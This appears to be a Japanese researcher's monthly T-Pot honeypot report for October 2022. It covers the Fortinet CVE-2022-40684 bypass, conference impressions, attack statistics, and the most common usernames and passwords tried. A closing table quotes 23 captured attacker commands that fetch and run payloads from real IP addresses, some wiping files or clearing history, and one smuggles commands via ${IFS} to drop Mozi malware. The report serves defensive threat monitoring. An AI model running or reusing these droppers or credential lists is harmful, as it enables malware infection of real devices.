今月のTopics
1.Fortinet製製品における認証バイパスの脆弱性
Fortinet製FortiOS、FortiProxyおよびFortiSwitchManagerの認証バイパスの脆弱性(CVE-2022-40684)に関する注意喚起 が報告された。
www.fortiguard.com www.jpcert.or.jp
PoCも多数公開されている。
認証回避の脆弱性を悪用して、指定したユーザーのSSH鍵を設定する。
出典: github.com
上記アクセスを確認すると調査用アクセスとして、数回のアクセスを観測した。PoCを使って動作検証をしており、501エラーで相手方へ戻っているようだ。 ※相手先ポートは80,81,9200が使われていた。
{ "dest_ip": [ "***.***.***.***" ], "dest_port": [ 9200 ], "event_type": [ "http" ], "geoip.city_name": [ "London" ], "geoip.ip": [ "212.71.255.156" ], "geoip.region_name": [ "England" ], "geoip.timezone.keyword": [ "Europe/London" ], "http.http_method": [ "PUT" ], "http.http_port": [ 9200 ], "http.http_user_agent": [ "Report Runner" ], "http.protocol": [ "HTTP/1.1" ], "http.status": [ 501 ], "http.url": [ "/api/v2/cmdb/system/admin/admin" ], "proto": [ "TCP" ], "src_ip": [ "212.71.255.156" ], "src_port": [ 33712 }
2.CodeBlue & AVTokyo参加
業務多忙の合間をぬってCodeBlue と AVTokyoに参加した。
・CodeBlueはC2サーバ関連の発表が特に印象的だった。C2情報をビットコインにのせる攻撃者の発想(ブロックチェーンに書き込まれた情報の削除は非常に困難)も凄いが、接続元IPを判定しないバグからシンクホールに追い込む発表者様の発想はもっと凄い。
・AVTokyoは初めてオフライン参加したが色々参考になった。知らない参加者の人にも積極的に声掛けできるようなコミュニケーション能力が必要だと痛感した。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2022年10月1日-2022年10月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先月比 |
---|---|---|---|
1 | Ddospot | 1,282,416 | 375,696 |
2 | Cowrie | 1,047,739 | 213,126 |
3 | Heralding | 786,088 | 258,293 |
4 | Honeytrap | 567,423 | 276,038 |
5 | Dionaea | 272,534 | 6,190 |
6 | Mailoney | 19,240 | ▲5,497 |
7 | Adbhoney | 18,015 | 3,838 |
8 | Tanner | 5,586 | 1,295 |
9 | ConPot | 2,761 | 494 |
10 | Redishoneypot | 2,661 | 566 |
11 | Ciscoasa | 2,140 | 1,001 |
12 | ElasticPot | 1,972 | 1,129 |
13 | CitrixHoneypot | 1,766 | 490 |
14 | Ipphoney | 215 | 82 |
15 | Dicompot | 100 | ▲79 |
- Result
- Mailoney、Dicompotのアクセス件数が減少
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | Brazil | 803,104 | 1(→) |
2 | Russia | 721,330 | 2(→) |
3 | United States | 466,798 | 3(→) |
4 | China | 320,982 | 4(→) |
5 | Netherlands | 266,773 | 5(→) |
6 | France | 94,263 | 14(↑) |
7 | United Kingdom | 90,636 | 13(↑) |
8 | India | 76,370 | 11(↑) |
9 | Japan | 73,027 | 6(↓) |
10 | Singapore | 64,220 | 9(↓) |
11 | Vietnam | 62,292 | 10(↓) |
12 | Sweden | 61,955 | 15(↑) |
13 | Germany | 54,237 | 7(↓) |
14 | South Korea | 45,540 | 12(↓) |
15 | Indonesia | 33,432 | 18(↑) |
16 | Panama | 30,925 | 圏外(↑) |
17 | Costa Rica | 29,318 | 圏外(↑) |
18 | Hong Kong | 27,679 | 圏外(↑) |
19 | Mexico | 27,555 | 17(↓) |
20 | Latvia | 26,590 | 16(↓) |
- Result
- Brazil(1位)~Netherlands(5位)までのアクセス順位に変動なし。
- Costa Rica(17位)のアクセスを新規に観測した。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | Count |
---|---|---|
1 | CVE-2020-11899 | 387,526 |
2 | CVE-2020-11910 | 41 |
3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 6 |
4 | CVE-1999-0016 | 1 |
- Result
- 特記事項なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 45,119 |
2 | admin | 7,579 |
3 | nproc | 3,331 |
4 | user | 3,046 |
5 | postgres | 2,472 |
6 | test | 2,350 |
7 | (empty) | 2,190 |
8 | ubuntu | 1,698 |
9 | oracle | 1,599 |
10 | sa | 1,554 |
11 | 22 | 1,283 |
12 | support | 983 |
13 | steam | 893 |
14 | ftpuser | 845 |
15 | guest | 823 |
16 | testuser | 661 |
17 | !root | 637 |
18 | es | 631 |
19 | 2Wire | 629 |
20 | git | 617 |
21 | mysql | 521 |
22 | www | 495 |
23 | pi | 484 |
24 | esuser | 480 |
25 | devops | 457 |
26 | hadoop | 450 |
27 | centos | 404 |
28 | ansible | 387 |
29 | vagrant | 385 |
30 | sh | 376 |
31 | dev | 363 |
32 | tester | 363 |
33 | 666666 | 358 |
34 | web | 357 |
35 | Admin | 348 |
36 | 0 | 346 |
37 | blank | 346 |
38 | ftp | 339 |
39 | cameras | 333 |
40 | minecraft | 328 |
41 | adm | 327 |
42 | unknown | 325 |
43 | $ALOC$ | 321 |
44 | ubnt | 320 |
45 | debug | 318 |
46 | halo | 313 |
47 | jenkins | 312 |
48 | student | 300 |
49 | deploy | 280 |
50 | tomcat | 277 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | 123456 | 12,127 |
2 | nproc | 3,331 |
3 | (empty) | 3,045 |
4 | 123 | 2,751 |
5 | admin | 2,412 |
6 | password | 2,353 |
7 | 1234 | 1,640 |
8 | 12345 | 1,377 |
9 | root | 1,109 |
10 | 12345678 | 1,045 |
11 | blank | 960 |
12 | 1 | 810 |
13 | 0 | 766 |
14 | user | 765 |
15 | test | 758 |
16 | ubnt | 652 |
17 | admin123 | 626 |
18 | test123 | 620 |
19 | support | 552 |
20 | 00000000 | 507 |
21 | 666666 | 468 |
22 | 123456789 | 456 |
23 | qwerty123 | 451 |
24 | password123 | 444 |
25 | alpine | 394 |
26 | 111111 | 391 |
27 | 1qaz2wsx | 374 |
28 | test1234 | 373 |
29 | abc123 | 372 |
30 | master | 372 |
31 | 1qaz@WSX | 367 |
32 | hi3518 | 361 |
33 | Test1234 | 358 |
34 | Aa123456 | 346 |
35 | 1234567890 | 338 |
36 | Aa123456. | 329 |
37 | cameras | 325 |
38 | P@ssw0rd | 323 |
39 | backup | 313 |
40 | 1q2w3e4r | 308 |
41 | 10023 | 305 |
42 | Test123 | 301 |
43 | !ishtar | 298 |
44 | _Cisco | 293 |
45 | qwerty | 288 |
46 | unknown | 285 |
47 | synnet | 284 |
48 | 1234567 | 282 |
49 | 123123 | 259 |
50 | bzrx1098ui | 249 |
- Result
- 全体的なアクセス件数は低下。
- bzrx1098ui(50位)に新規パスワードを確認。脆弱なパスワードには含まれているが、どのような種類のパスワードかは不明
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- AVTokyo2022のBadge、会社用に余分に購入したけど誰も欲しい人おらず。_| ̄|○il||li ガックシ・・il||li
- 10月はCodeBlue + AVTokyoと他セキュリティイベントが目白押しのため、有意義だが非常にhard!!
◆shファイルに関するアクセス
No | ファイル名 | hash値(md5) | アクセス |
---|---|---|---|
1 | 1sh | - | rm -rf /var/run/1sh; wget -c htt[p]://92.207.203.157/x/1sh -P /var/run && sh /var/run/1sh &, |
2 | 2sh | - | rm -rf /tmp/2sh; wget -c htt[p]://92.207.203.157/x/2sh -P /tmp && sh /tmp/2sh &, |
3 | 23.sh | - | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget htt[p]://125.27.179.36/scripts/23s; curl -O htt[p]://125.27.179.36/scripts/23s; chmod +x 23s; ./23s; wget htt[p]://125.27.179.36/scripts/23; curl -O htt[p]://125.27.179.36/scripts/23; chmod +x 23; ./23; rm -rf 23.sh; history -c; , |
4 | 666.sh | 86f1b914488183e170541692ffd31f8f | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://109.206.241.129/666.sh; curl -O htt[p]://109.206.241.129/666.sh; chmod 777 666.sh; sh 666.sh; tftp 109.206.241.129 -c get t666.sh; chmod 777 t666.sh; sh t666.sh; tftp -r t6662.sh -g 109.206.241.129; chmod 777 t6662.sh; sh t6662.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.129 6661.sh 6661.sh; sh 6661.sh; rm -rf 666.sh t666.sh t6662.sh 6661.sh; rm -rf *, |
5 | adbc.sh | - | cd /data/local/tmp/; wget htt[p]://135.148.104.21/adb.sh; busybox wget htt[p]://135.148.104.21/adb.sh; sh adb.sh; curl htt[p]://135.148.104.21/adbc.sh; sh adbc.sh |
6 | andbg | - | busybox wget htt[p]://31.220.3.140/andbg -O- | sh; busybox curl htt[p]://31.220.3.140/andbg | sh, |
7 | bcurl | - | >/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget htt[p]://45.61.184.119/wget; sh wget; busybox wget htt[p]://45.61.184.119/bwget; sh bwget; busybox curl htt[p]://45.61.184.119/bcurl > bcurl; sh bcurl; curl htt[p]://45.61.184.119/curl > curl; sh curl, |
8 | bw.sh | 0dc8d5729a91b903101d063fbb3565ba | cd /data/local/tmp/;rm -rf .sh; rm -rf .; wget htt[p]://185.156.73.178/bins/w.sh; busybox wget htt[p]://185.156.73.178/bins/bw.sh; sh bw.sh; curl -O htt[p]://185.156.73.178/bins/c.sh; sh c.sh; busybox curl -O htt[p]://185.156.73.178/bins/bc.sh; sh bc.sh, |
9 | c.sh | - | cd /data/local/tmp/; busybox wget htt[p]://bins.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/w.sh; sh w.sh; curl htt[p]://bins.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/c.sh; sh c.sh, |
10 | doge.sh | 0ba62dd2750c230a7e610fa2d9c99746 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://45.140.188.33/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 45.140.188.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.140.188.33; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.140.188.33 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *, |
11 | hypnose.sh | 91d188c8c1a3fd1a18ba12e52469b51b | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://5.253.246.70/hypnose.sh; curl -O htt[p]://5.253.246.70/hypnose.sh; chmod 777 hypnose.sh; sh hypnose.sh; tftp 5.253.246.70 -c get hypnose.sh; chmod 777 hypnose.sh; sh hypnose.sh; tftp -r hypnose2.sh -g 5.253.246.70; chmod 777 hypnose2.sh; sh hypnose2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.253.246.70 hypnose1.sh hypnose1.sh; sh hypnose1.sh; rm -rf hypnose.sh hypnose.sh hypnose2.sh hypnose1.sh; rm -rf *, |
12 | lol.sh | 05d30b5bdeb2ddff9a8c5a24c00116f7 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://37.139.128.107/lol.sh; curl -O htt[p]://37.139.128.107/lol.sh; chmod 777 lol.sh; sh lol.sh; tftp 37.139.128.107 -c get lol.sh; chmod 777 lol.sh; sh lol.sh; tftp -r lol2.sh -g 37.139.128.107; chmod 777 lol2.sh; sh lol2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.139.128.107 lol1.sh lol1.sh; sh lol1.sh; rm -rf lol.sh lol.sh lol2.sh lol1.sh; rm -rf *, |
13 | ohshit.sh | 0726ad2ea637587586557a4a07a8f5c2 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://92.87.6.205/ohshit.sh; curl -O htt[p]://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *, |
14 | sensi.sh | 6197d45d92ade6b1ae9b3609412939ac | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://185.117.3.120/sensi.sh; curl -O htt[p]://185.117.3.120/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 185.117.3.120 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 185.117.3.120; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.117.3.120 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *, |
15 | shr | - | rm -rf shr; wget htt[p]://46.23.109.47/shr || curl -O htt[p]://46.23.109.47/shr || tftp 46.23.109.47 -c get shr || tftp -g -r shr 46.23.109.47; chmod 777 shr;./shr ssh; rm -rf shr, |
16 | sshc.sh | 05c4e4aab0fd5ee629123a4d6a51e21e | cd /tmp; wget htt[p]://179.43.175.5/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; curl htt[p]://179.43.175.5/sshc.sh -o sshc.sh; chmod 777 sshc.sh; sh sshc.sh; rm -rf *;, |
17 | test.sh | cd3bc3e3adc45fd96640d27d1ebc9dbe | cd /tmp; rm -rf test.sh; wget htt[p]://179.43.175.5/test.sh; curl htt[p]://179.43.175.5/test.sh -o test.sh; chmod 777 test.sh; ./test; sh test.sh, |
18 | tftp1.sh | - | cd /tmp || cd /var/run ||cd /mnt || cd /root || cd /; wget htt[p]://147.182.161.44/SnOoPy.sh; chmod 777 ; sh SnOoPy.sh; tftp -g 147.182.161.44 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c, |
19 | w.sh | - | cd /data/local/tmp/; busybox wget htt[p]://107.182.129.219/w.sh; sh w.sh android.exploit; curl htt[p]://107.182.129.219/c.sh; sh c.sh android.exploit, |
20 | wget.sh | 162ee53ef9df69eb808f72492d1390c0 | cd /data/local/tmp/; busybox wget htt[p]://141.98.6.110/w.sh; sh w.sh; curl htt[p]://141.98.6.110/c.sh; sh c.sh; wget htt[p]://141.98.6.110/wget.sh; sh wget.sh; curl htt[p]://141.98.6.110/wget.sh; sh wget.sh; busybox wget htt[p]://141.98.6.110/wget.sh; sh wget.sh; busybox curl htt[p]://141.98.6.110/wget.sh; sh wget.sh, |
21 | wwww | c08752a9c35abaf1ab3f61830fb92e4a | cd /data/local/tmp; busybox wget htt[p]://5.206.227.228/wget -O -> wwww; sh wwww; curl -O htt[p]://5.206.227.228/curl; sh curl; rm wwww curl, |
22 | string.js | d1a7cdaa1eda1b2bb1a2daeec1943da0 | /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}htt[p]://175.107.13.18:55939/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js |
23 | wget.sh | 078e9a9b315d76ae99d7449aa8182fee | /cgi-bin/;cd+/tmp;wget+htt[p]:/45.95.55.214/a/wget.sh;chmod+777+wget.sh;sh+wget.sh+Netgear;rm+-rf+wget.sh |
◆exeファイルに関するアクセス
- 無し
今月の作業BGM
曲名 | アーティスト | 備考 |
---|---|---|
You Can Call Me Al | Paul Simon | --- |